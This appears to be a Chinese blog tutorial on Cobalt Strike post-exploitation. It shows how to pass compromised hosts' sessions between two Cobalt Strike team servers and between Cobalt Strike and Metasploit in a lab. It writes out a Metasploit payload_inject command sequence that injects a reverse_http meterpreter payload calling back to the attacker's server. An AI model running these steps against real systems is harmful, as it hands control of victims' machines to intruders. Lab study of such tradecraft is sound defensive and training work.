首页 > 其他分享 >内网渗透神器CobaltStrike之会话管理(五)

内网渗透神器CobaltStrike之会话管理(五)

时间:2022-11-21 16:13:50浏览次数:63  
标签:metasploit 派生 192.168 之会话 神器 会话 CobaltStrike CS 服务器

CS之间派生会话

将CS1管理的会话派生至CS2中, 简单来说就是将CS1服务器的肉鸡送给CS2服务器


准备环境

主机 描述
Kali(192.168.47.134) CS TeamServer1
Kali2(192.168.47.144) CS TeamServer2
Windows7(192.168.47.133) CS客户端,攻击机
Windows7(192.168.47.141) 受害机

操作步骤

首先用CS客户端连接两个不同的CS服务器, 而我们要做的是将CS1的会话派生到CS2中去

image-20221005225524757


在CS2服务器和CS1服务器都新建一个同样配置的监听用于接收派生过来的会话, 监听的host地址要填写为CS2服务器ip地址

image-20221005225938081

image-20221005230525306


派生会话选择上述建立的监听, 随后切换至连接CS2服务器的客户端查看派生过来的主机

动画

1


CS派生会话至metasploit

将CS服务器的会话派生至metasploit中, 方便进行漏洞攻击


准备环境

主机 描述
Kali(192.168.47.134) CS TeamServer1
Kali2(192.168.47.144) metasploit
Windows7(192.168.47.133) CS客户端,攻击机
Windows7(192.168.47.141) 受害机

操作步骤

进入kali2输入命令:msfconsole, 运行metasploit

image-20221005234248726


metasploit新建监听用于接收CS派生过来的会话

image-20221006153754571


返回至CS服务器建立外部监听, payload选择Foreign HTTP, 其余内容与metasploit建立的监听一致

image-20221006153852260


派生会话选择上述建立的外部监听t, 然后返回Metasploit查看上线情况

动画


metasploit派生会话至CS

将metasploit管理的会话派生至CS服务器


准备环境

主机 描述
Kali(192.168.47.134) CS TeamServer1
Kali2(192.168.47.144) metasploit
Windows7(192.168.47.133) CS客户端,攻击机
Windows7(192.168.47.141) 受害机

操作步骤

首先查看MSF中需派生会话的ID, 输入命令: sessions, 此处要派生的会话ID为6 (下面的截图截错了)

image-20221006163339205


输入如下命令进行派生会话, 派生完成后返回会话的进程PID为3322

use exploit/windows/local/payload_inject  

set payload windows/meterpreter/reverse_http

set lhost 192.168.47.134

set lport 80

set disablepayloadhandler True  //默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true

set session 6

exploit

image-20221006173316522


返回CS查看上线的会话 (PID:3332)

image-20221006173808452

标签:metasploit,派生,192.168,之会话,神器,会话,CobaltStrike,CS,服务器
From: https://www.cnblogs.com/henry666/p/16911732.html

相关文章

  • 发泄神器
     发泄神器android版一款娱乐发泄应用小软件,你是不是有很多讨厌的人,经常受到这些人的欺负,让你感到很压抑?压抑久了不好哦,心中是不是积蓄了很多怒火,发泄出来吧现在这款发泄......
  • Fiddler收费没得用?这款抓包神器 Github star 过万,一个字:香
    关于抓包,那是测试人员必备技能之一了,通常我们会通过一些抓包工具来辅助我们测试、定位bug。我最早接触并使用的就是fiddler,不过目前最新版本已经要开始付费了,以前很老的......
  • 工程师必备神器之批量命令生成器
    工具用途批量生成有规律的路由器、交换机命令,工程师只需将批量生成的命令,复制到CRT中执行即可,配置设备过程中有些繁琐的操作,今天可以通过我介绍的这个小工具来解决。适用......
  • 内网渗透神器CobaltStrike之Beacon详解(三)
    Beacon的种类HTTPBeacon和HTTPSBeacon这两个beacon的原理是通过发送http请求与受害主机通信来传达命令,以此实现控制效果优点是传输数据快,缺点时隐蔽性差,容易被......
  • 内网渗透神器CobaltStrike之重定向服务配置(二)
    重定向服务的概念"重定向"是一个在CS服务器与目标主机进行网络传输之间的服务器,不仅能保护CS服务器,还能增强与目标网络传输的稳定性,例如某一台重定向服务器倒塌了,......
  • CobaltStrike注入MSF会话
    声明:本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关准备工作kali机开启CS服务器Win10开启msf、CS客户端Win7充当一台靶机  第一步:利用m......
  • CobaltStrike之信息收集
    声明:本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关CobalitStrike简称CS,是一个渗透测试的利器,它可以被分为一个服务端和多个客户端,所以可以被用来......
  • 联调神器,处理你未考虑到的bug。打日志,请求日志
    目录:1、ErrorAopAdvicepackagesj.aopLog;importcom.alibaba.fastjson.JSON;importcom.alibaba.fastjson.serializer.SerializerFeature;importlombok.extern.sl......
  • 微软开源最强Python自动化神器Playwright!不用写一行代码!自动生成代码还竟然如此流畅!妈
    安装#安装playwright库pipinstallplaywright#安装浏览器驱动文件python-mplaywrightinstall#再安装playwrightinstall要求:python版本3.7+使用Playwright无需写一行......
  • Python代码写得丑怎么办?推荐几个神器拯救你
    Python编程语言需要遵循PEP8规范,但是初学者往往记不住这个规范,代码写得比较丑。本文推荐几个神器来拯救奇丑无边的python代码。一、Jupyternotebook篇Jupyternotebook的......